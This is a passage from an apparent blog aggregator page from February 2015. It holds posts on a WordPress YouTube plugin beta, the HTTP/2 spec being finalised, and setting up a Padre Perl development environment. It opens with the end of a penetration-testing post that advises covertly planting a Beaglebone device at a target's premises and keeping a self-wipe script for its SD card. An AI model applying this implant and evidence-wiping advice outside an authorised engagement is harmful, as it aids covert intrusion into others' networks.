Last login: Wed Feb 18 20:58:43 2015 from mclt0040-eth0.home.rootshell.be
xavier@beagle:~$

Now drop your Beaglebone in a nice place at your target’s location like a meeting room, behind a computer (and use one USB port to power it) and walk away… Happy hunting! One last tip: when your micro SD card is ready, make a copy of it to easily re-install new Beaglebones. They are cheap and can be left onsite after your engagement. Just bill it to your customer. If you leave it onsite, be sure to have a suicide-script to wipe the data on the SD card!

by Xavier at February 19, 2015 03:02 PM

February 18, 2015

Frank Goossens

Wanted: testers for WP YouTube Lyte (the one with the new YT API)

As I wrote a couple of weeks ago, YouTube is shutting down their old v2 API, forcing WP YouTube Lyte to swith to v3. The main change; users will have to get an API key from Google and provide that in the Lyte settings page.

Initial development & testing has been done (this blog switched already) and I now need some brave souls to test this. You can download the “beta” from https://downloads.wordpress.org/plugin/wp-youtube-lyte.zip and report back here or on the wordpress.org support forum about how that did or did not work for you.

Looking forward to having to fix some nasty bugs until everything will finally be in it’s right place once again ;-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at February 18, 2015 04:25 PM

Mattias Geniar

HTTP/2 Specification Is Final

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

February 18th, 2015. A day that, for better or worse, will change the internet.

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published.
mnot.net

This means HTTP/2 has been finalised and the spec is ready to be implemented.

Here are a few things to read up on, in case you're new to the HTTP/2 protocol.

I for one am happy to see HTTP/2 be finalised. There are some really good parts about the spec. Yes, it's lacking in some areas -- but it's by far an improvement over the HTTP/1.1 spec.

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

by Mattias Geniar at February 18, 2015 07:05 AM

February 17, 2015

Claudio Ramirez

Build the Padre development tree using local::lib on Debian/Ubuntu

catThanks to the great job of Kaare Rasmussen (kaare) and Kevin Dawson (bowtie) moving the Padre repository from a stalled svn/trac setup to github (and keeping the repo alive), hopefully the development can be rebooted.

I posted a small howto about setting and development environment to hack on Padre (svn), but it’s already outdated due to the new libraries that Linux distros now package (gtk3, wx 3.0.1, etc.). The fastest way I found to setup a Padre environment is using local::lib (https://metacpan.org/pod/local::lib).

Because recent Linux distributions have recent Perl and Padre packages, you won’t be working with ancient packages. E.g., Ubuntu 14.10 comes with Perl 5.20.1 and Padre 1.0 (this is also valid for Debian Testing/Unstable). Kudos to the Debian Perl Group (https://pkg-perl.alioth.debian.org/).

These instructions are provided for building an development environment to hack on Padre itself or to keep track of the most recent changes on github.

These are the step to get Padre fromgithub:

  • Get the OS dependencies. The easieast way is just to install the packaged padre. Its dependencies include local::lib:
    $ sudo apt-get install padre

The OS-packaged Padre can of course be starting by just typing:

$ padre

  • Get development dependencies for Padre:
    $ cpanm -l ~/perl5 Module::Install
  • Install Padre and dependencies:
    $ cpanm -l ~/perl5 .
  • Run Padre:
    – in dev mode:
    $ ./dev
    - or the local::lib installed app:
    $ ~/perl5/bin/padre

Filed under: Uncategorized Tagged: github, local::lib, Padre, Perl

by claudio at February 17, 2015 10:16 PM